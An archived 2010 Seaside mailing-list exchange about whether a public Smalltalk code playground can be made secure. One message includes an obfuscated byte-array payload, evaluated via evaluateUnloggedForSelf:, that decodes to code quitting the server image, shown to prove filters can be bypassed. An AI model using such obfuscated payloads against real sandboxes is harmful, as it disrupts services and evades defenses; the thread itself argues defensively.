[Seaside] Seaside playground

Cédrick Béler cdrick65 at gmail.com
Mon Jan 11 10:06:21 UTC 2010 

2010/1/11 Gerhard Obermann <obi068 at gmail.com>

> Are there any options to make it really secure?
>
>
The best option is probably to serve it independantly of seaside.st and
include it in seaside.st.

Also, you should catch undeclared variables:

I just tried the following expression that open a debugger as the variable
is not declared
html anchor callback: [anAction]; with: 'Click me'.



Cheers



> Gerhard
>
>
> On Mon, Jan 11, 2010 at 10:13 AM, Lukas Renggli <renggli at gmail.com> wrote:
>
>> > Thats not a simple hack.
>> > And it doesn't really take over the computer.
>>
>> Sure. As soon as I can execute arbitrary Smalltalk code on your
>> machine, i can deploy a Trojan for your platform.
>>
>> > Anyway, such hacks are not possible anymore.
>>
>> There is an infinite number of other hacks. It gets harder over time,
>> but the one below is particularly simple:
>>
>> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
>> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
>> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
>> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
>> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>>
>> My point is that no matter how much time you spend on making it secure
>> by checking for particular patterns or strings, there will always be
>> ways to fool it. In the Smalltalk world security is inherently weak,
>> mostly because of the strong reflective capabilities. I would really
>> love to see you application on the web, but in its current form we
>> won't be able to run it on seaside.st.
>>
>> Lukas
>>
>> --
>> Lukas Renggli
>> http://www.lukas-renggli.ch
>> _______________________________________________
>> seaside mailing list
>> seaside at lists.squeakfoundation.org
>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside
>>
>
>
> _______________________________________________
> seaside mailing list
> seaside at lists.squeakfoundation.org
> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside
>
>


-- 
Cédrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.squeakfoundation.org/pipermail/seaside/attachments/20100111/1c965247/attachment.htm

More information about the seaside mailing list